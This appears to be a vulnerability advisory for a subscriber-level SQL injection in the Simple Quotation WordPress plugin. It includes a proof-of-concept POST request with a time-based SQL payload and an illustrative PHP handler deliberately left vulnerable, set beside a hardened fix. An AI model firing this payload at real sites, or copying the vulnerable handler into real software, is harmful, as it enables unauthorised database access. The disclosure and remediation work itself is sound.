wpexploit | Abhishek bhoir | WPEX-ID:6940A97E-5A75-405C-BE74-BEDCC3A8EE00
Feb 16, 2022 - 12:00 a.m.

Simple Quotation <= 1.3.2 - Subscriber+ SQL injection

2022-02-16 00:00:00
abhishek bhoir
sql injection
subscriber+
post request
delete link

EPSS: 0.001 (percentile: 37.7%)

The plugin lacks authorisation and CSRF checks in several of its AJAX actions and does not escape user data before using it in SQL statements, allowing any authenticated user, such as a subscriber, to perform SQL injection attacks.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 41
Connection: close
Cookie: [subscriber+]

action=delete_link&idLink=2+OR+SLEEP(2)--
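
The flaw class described above, shown as an added example that is not the plugin's own code: a handler with the three missing controls omitted, next to a hardened version. The function names, the table name `sq_example_links`, the nonce action and the `manage_options` capability are assumptions made for illustration; only the `delete_link` action and the `idLink` parameter come from the request above.

```php
<?php
// Hypothetical code: names, table and capability are assumptions, not taken from the plugin.

// Vulnerable pattern: reachable by every logged-in user through wp_ajax_*,
// no capability check, no nonce, request value concatenated into the SQL.
function sq_example_delete_link_vulnerable() {
    global $wpdb;
    $id = $_POST['idLink'];
    $wpdb->query( "DELETE FROM {$wpdb->prefix}sq_example_links WHERE id = $id" );
    wp_die();
}

// Hardened pattern: nonce, capability check, strict integer validation,
// and a typed placeholder instead of string concatenation.
function sq_example_delete_link() {
    global $wpdb;

    // CSRF: terminates the request with 403 if the nonce is missing or invalid.
    check_ajax_referer( 'sq_example_delete_link', 'nonce' );

    // Authorisation: wp_ajax_* only proves the caller is logged in.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Input: accept a positive integer only. A value such as the one in the
    // request above fails validation instead of being truncated to "2".
    $raw = isset( $_POST['idLink'] ) ? wp_unslash( $_POST['idLink'] ) : '';
    $id  = filter_var( $raw, FILTER_VALIDATE_INT, array( 'options' => array( 'min_range' => 1 ) ) );
    if ( false === $id ) {
        wp_send_json_error( 'invalid idLink', 400 );
    }

    // Query: $wpdb->delete() builds a prepared statement; %d binds the id as an integer.
    $deleted = $wpdb->delete(
        $wpdb->prefix . 'sq_example_links',
        array( 'id' => $id ),
        array( '%d' )
    );

    wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}
add_action( 'wp_ajax_delete_link', 'sq_example_delete_link' );
```

The hardened handler expects the page that triggers the request to send a `nonce` field generated with `wp_create_nonce( 'sq_example_delete_link' )`.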
